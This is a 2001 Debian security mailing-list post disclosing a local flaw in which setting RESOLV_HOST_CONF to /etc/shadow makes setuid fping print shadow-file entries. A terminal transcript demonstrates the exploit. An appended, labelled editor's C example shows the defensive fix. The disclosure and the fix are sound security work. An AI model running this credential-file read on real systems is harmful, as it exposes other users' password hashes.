
Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability

Since I've not had any response yet, I thought I'd give a demonstration of how
nasty this is:

  Script started on Mon Jan  8 17:48:23 2001
  thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
  thomas@io:~$ ping localhost
  PING localhost (127.0.0.1): 56 data bytes

  --- localhost ping statistics ---
  2 packets transmitted, 0 packets received, 100% packet loss
  thomas@io:~$ fping localhost
  /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'

  [snip]

  /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
  localhost is unreachable
  thomas@io:~$ ls -l `which fping`
  -rwsr-xr-x    1 root     root        19728 May 15  2000 /usr/bin/fping
  thomas@io:~$ ls -l `which ping`
  -rwsr-xr-x    1 root     root        15036 Dec 31 04:11 /bin/ping
  thomas@io:~$ ldd `which fping`
    	libc.so.6 => /lib/libc.so.6 (0x40021000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
  thomas@io:~$ ldd `which ping`
    	libc.so.6 => /lib/libc.so.6 (0x40021000)
    	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
  thomas@io:~$ exit

  Script done on Mon Jan  8 17:49:42 2001

It seems to work for some setuid programs, but not others.  I'm running the
most recent packages from unstable as of today:

ii  libc6          2.2-9          GNU C Library: Shared libraries and Timezone
ii  netkit-ping    0.10-5         The ping utility from netkit
ii  fping          2.2b1-2        Send ICMP ECHO_REQUEST packets to network ho

cheers,

Thomas


On Mon, 8 Jan 2001, thomas lakofski wrote:

> From: thomas lakofski <thomas@88.net>
> To: security@debian.org, debian-security@lists.debian.org
> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>
> Hi,
>
> A friend of mine just tried this against my unstable box and successfully
> obtained the contents of /etc/shadow.
>
> I imagine that this is a problem in libc -- I'll leave it to
> security@debian.org to file bug reports.
>
> cheers,
>
> Thomas
>
>

-- 
          who's watching your watchmen?
gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43
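Editor's added example (not part of Thomas's message, and not code from glibc, netkit-ping or fping): the two defensive rules the transcript above argues for, written out in C. A program that may run set-user-ID must not trust a configuration path taken from its environment, and a parser's diagnostics must not echo the text of lines it rejects, because the file it was pointed at may be one the invoking user could not read. The function names (`select_host_conf`, `host_conf_path`, `count_bad_host_conf_lines`) and the sample file contents are hypothetical and constructed for this example; the privilege test compares real and effective ids, which is the portable form of the check that glibc's `secure_getenv()` later wrapped.

```c
/* Added example: honouring RESOLV_HOST_CONF only in an unprivileged process,
 * and reporting bad host.conf lines without printing their contents.
 * Function names and sample data are hypothetical, not from any real project. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_HOST_CONF "/etc/host.conf"

/* Non-zero when real and effective ids differ: the process obtained its
 * privileges from a set-user-ID or set-group-ID bit, so the environment
 * it inherited was chosen by a less privileged user and must not be trusted. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Pure decision function, kept separate so it can be tested without a real
 * setuid binary: the override is used only if set, non-empty and unprivileged. */
const char *select_host_conf(const char *env_value, int privileged)
{
    if (env_value != NULL && env_value[0] != '\0' && !privileged)
        return env_value;
    return DEFAULT_HOST_CONF;
}

/* Path a resolver should open: RESOLV_HOST_CONF for an ordinary process,
 * the compiled-in default otherwise. */
const char *host_conf_path(void)
{
    return select_host_conf(getenv("RESOLV_HOST_CONF"), running_privileged());
}

/* Directives accepted in host.conf; anything else is a bad line. */
static const char *const HOST_CONF_KEYWORDS[] = {
    "order", "trim", "multi", "nospoof", "spoofalert", "reorder", NULL
};

/* 1 if the line is blank, a comment, or starts with a known keyword; else 0. */
int host_conf_line_ok(const char *line)
{
    while (*line == ' ' || *line == '\t') line++;
    if (*line == '\0' || *line == '\n' || *line == '#') return 1;
    for (const char *const *k = HOST_CONF_KEYWORDS; *k != NULL; k++) {
        size_t klen = strlen(*k);
        if (strncmp(line, *k, klen) == 0 &&
            (line[klen] == ' ' || line[klen] == '\t' ||
             line[klen] == '\n' || line[klen] == '\0'))
            return 1;
    }
    return 0;
}

/* Counts bad lines in an in-memory host.conf. The diagnostic names the file
 * and line number only; the rejected text is deliberately never printed, so a
 * caller who points the parser at an unreadable file learns nothing from it. */
int count_bad_host_conf_lines(const char *path, const char *contents)
{
    int bad = 0, lineno = 0;
    const char *p = contents;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        lineno++;
        if (!host_conf_line_ok(line)) {
            bad++;
            fprintf(stderr, "%s: line %d: unrecognised directive\n", path, lineno);
        }
        p = nl ? nl + 1 : p + strlen(p);
    }
    return bad;
}

int main(void)
{
    /* Constructed samples: a valid host.conf and a file of unrelated records. */
    const char *good = "order hosts,bind\nmulti on\n# comment\n";
    const char *foreign = "user1:*:0:0:0:0:::\nuser2:*:0:0:0:0:::\n";
    printf("resolver will read: %s\n", host_conf_path());
    printf("bad lines in sample host.conf: %d\n",
           count_bad_host_conf_lines("sample.conf", good));
    printf("bad lines in foreign file: %d\n",
           count_bad_host_conf_lines("foreign", foreign));
    return 0;
}
```

Run as a normal user with RESOLV_HOST_CONF set and the first line shows the override; installed set-user-ID, the same binary reports /etc/host.conf regardless of the environment, and in either case a mis-pointed file yields only line numbers on stderr.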